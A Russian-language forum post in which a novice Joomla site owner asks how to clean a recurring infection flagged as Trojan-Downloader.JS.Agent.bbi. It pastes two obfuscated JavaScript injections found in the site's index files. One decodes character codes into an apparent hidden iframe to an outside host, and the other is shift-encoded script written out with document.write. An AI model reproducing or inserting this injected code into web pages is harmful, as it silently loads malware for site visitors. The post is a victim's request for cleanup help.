Добрый день! Нуждаюсь в совете специалиста. Есть сайт www.vsemnado.com, когда-то заинтересовался joomla, и повесил его для экспериментов.
Веб мастер и программист я-асс! Вернее не асс, а АВС! (это, чтоб понятен был мой уровень) Месяц я на него не заходил, а тут решил его обновить и запустить в дело…
Захожу а кашперовский визжит – на сайте вирус: троянская программа Trojan-Downloader.JS.Agent.bbi !! Хостеры ни чем? говорят помочь не можем.
Слил начал разбираться он дописывает ко всем файлам с именем “index” вот такое:
language='JavaScript'>
<!--
function decode() {
var t,o,l,i,j;
var s='';
s=s+'060047116101120116097116101097062060047116101 120116097114101097062';
s=s+'060105102114097109101032115114099061034104116 11611205804704711511210804611810511204510010011111 5046';
s=s+'111114103047105110100101120046112104112034032 11910510011610406104903210410110510310411606104903 2115';
s=s+'116121108101061034118105115105098105108105116 12105803210410510010010111003406206004710510211409 7109';
s=s+'101062';
t=''; l=s.length; i=0;
while(i < (l-1)) {
for(j=0;j<3;j++)
{
t=t+s.charAt(i);
i++;
}
document.write(String.fromCharCode(t));
t='';
}
}

decode();
//-->
В последней строке </script> удалил чтобы не подарить вирус, и в начале <script –убрал, думаю уже так вирус не работает…
Удалил старую , залил новую joomlu.
Вроде должно, было бы все нормально, так нет… Заметил, что начали тормозить переключения в админке. Понаблюдал – обращается на сайт kizadarai.info.
Так же в файлах index обнаружен код в конце:

</ скрипт ><скрипт>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74& 86&7e&7
6&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f& 77&83&7g&7e&54&79
&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3 d&42&42&45&3d&42
&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3 d&42&42&49&3d&4:
&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&47&3d&4 2&42&45&3d&47&4
2&3d&44&45&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d& 47&42&3d&45&4:&3
d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42& 41&44&3d&42&41&
45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42 &46&3d&42&42&47&
3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44 &4:&3d&42&42&49&
3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&49&3d&42 &41&46&3d&42&41&
49&3d&42&41&46&3d&42&42&47&3d&42&43&42&3d&46&49&3d &44&43&3d&42&41&
45&3d&42&41&46&3d&42&41&41&3d&42&41&41&3d&42&41&42 &3d&42&42&41&3d&
44&4:&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42 &41&43&3d&42&42&
45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&44 &43&3d&47&41&3d&
42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41 &4:&3d&42&41&42&
3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42 &3d&44&4:&3d&42&
41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49 &3d&45&48&3d&45&
48&3d&42&41&48&3d&42&41&46&3d&42&43&43&3d&4:&48&3d &42&41&41&3d&4:&4
8&3d&42&42&45&3d&4:&48&3d&42&41&46&3d&45&47&3d&42& 41&46&3d&42&42&41
&3d&42&41&43&3d&42&42&42&3d&45&48&3d&42&42&48&3d&4 2&42&43&3d&42&41&
41&3d&45&48&3d&42&41&46&3d&42&42&41&3d&42&41&41&3d &42&41&42&3d&42&4
3&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43& 3d&44&4:&3d&44&43&
3d&42&42&4:&3d&42&41&46&3d&44&45&3d&42&44&3d&42&41 &3d&42&41&41&3d&42
&42&42&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&4 2&3d&42&42&41&3d&4
2&42&47&3d&45&47&3d&42&42&4:&3d&42&42&45&3d&42&41& 46&3d&42&42&47&3d&
42&41&42&3d&45&41&3d&49&44&3d&42&42&47&3d&42&42&45 &3d&45&47&3d&42&42
&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3 d&42&42&45&3d&42&41
&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&46&44&3d&4 6&41&3d&45&45&3d&45
&4:&3d&45&49&3d&46&44&3d&45&42&3d&45&45&3d&49&44&3 d&42&42&47&3d&42&42
&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&4 2&42&46&3d&42&42&47&
3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d &45&41&3d&45&49&3d&4
5&45&3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43& 3d&47&41&3d&45&48&3d
&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&4 2&43&3d&42&42&47&3d&47&43&3:
&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </ скрипт >
Правда кашперовский как вирус не определяет, другими не пробовал...
Почистил, снова появляется и что самое интересное дописывает себя, и файлы становятся больше и больше…
Пробовал пробить ай пи не получается, защищен. Не знаю чем защитить сайт.
Помочь можете?